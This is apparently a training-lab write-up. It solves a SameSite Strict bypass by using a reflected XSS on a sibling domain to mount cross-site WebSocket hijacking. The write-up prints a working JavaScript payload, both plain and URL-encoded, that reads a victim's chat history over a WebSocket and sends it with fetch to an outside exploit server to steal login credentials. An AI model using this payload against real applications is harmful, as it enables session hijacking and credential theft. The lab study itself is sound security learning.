LAB 9 - SameSite Strict bypass via sibling domain

Initial instructions

This lab's live chat feature is vulnerable to cross-site WebSocket hijacking (CSWSH). To solve the lab, log in to the victim's account.

To do this, use the provided exploit server to perform a CSWSH attack that exfiltrates the victim's chat history to the default Burp Collaborator server. The chat history contains the login credentials in plain text.

To solve this lab first of all I will intercept the GET /chat request. After forward the request I realized there's a WebSocket, so may be vulnerable to CSWSH.

To confirm that I went to the exploit server and I used that payload.

<script>
let newWebSocket = new WebSocket("wss://0ab3003503e7388f80804e3200dd0015.web-security-academy.net/chat");

newWebSocket.onopen = function (evt) {
  newWebSocket.send("READY");
};

newWebSocket.onmessage = function (evt) {
  var message = evt.data;
  fetch(
    "https://exploit-0a5c00550326381680bc4d63011f00b9.exploit-server.net/exploit?msg=" + btoa(message)
  );
};
</script>

I will deliver to the victim and if I go to the log, I got the following request.

Lets decode it for it I used burp decoder. (Its Base64)

After a bit we can see in our HTTP History a request to /resources/js/chat.js.

Here we can see that the ACAO has a subdomain, this is considered a sibling domain.

In this new subdomain we can see there's a login here in the username I tried to inject a basic XSS payload to see if it gets reflected. And it successfully got reflected.

What can we do is URL encode this request.

<script>
let newWebSocket = new WebSocket("wss://0ab3003503e7388f80804e3200dd0015.web-security-academy.net/chat");

newWebSocket.onopen = function (evt) {
  newWebSocket.send("READY");
};

newWebSocket.onmessage = function (evt) {
  var message = evt.data;
  fetch(
    "https://exploit-0a5c00550326381680bc4d63011f00b9.exploit-server.net/exploit?msg=" + btoa(message)
  );
};
</script>

And send it to the vulnerable parameter, in this case username.

This is my request URL Encoded.

%3c%73%63%72%69%70%74%3e%0a%6c%65%74%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%22%77%73%73%3a%2f%2f%30%61%63%66%30%30%36%30%30%34%31%65%63%31%36%30%38%30%30%64%30%33%36%36%30%30%63%36%30%30%36%63%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%22%29%3b%0a%0a%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%7d%3b%0a%0a%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%76%61%72%20%6d%65%73%73%61%67%65%20%3d%20%65%76%74%2e%64%61%74%61%3b%0a%20%20%66%65%74%63%68%28%0a%20%20%20%20%22%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%61%34%30%30%32%30%30%34%33%30%63%31%66%38%38%30%66%39%30%32%39%31%30%31%63%33%30%30%64%31%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%73%67%3d%22%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%0a%20%20%29%3b%0a%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e

Now I generated a CSRF PoC from the this request and I send it to the victim.

Here I deliver to the victim.

And if I go to the log we can see the following requests, lets decode them.

Once I decode them here we have the password from Carlos.

Lets use them to solve the lab.

Congratulations, you solved the lab!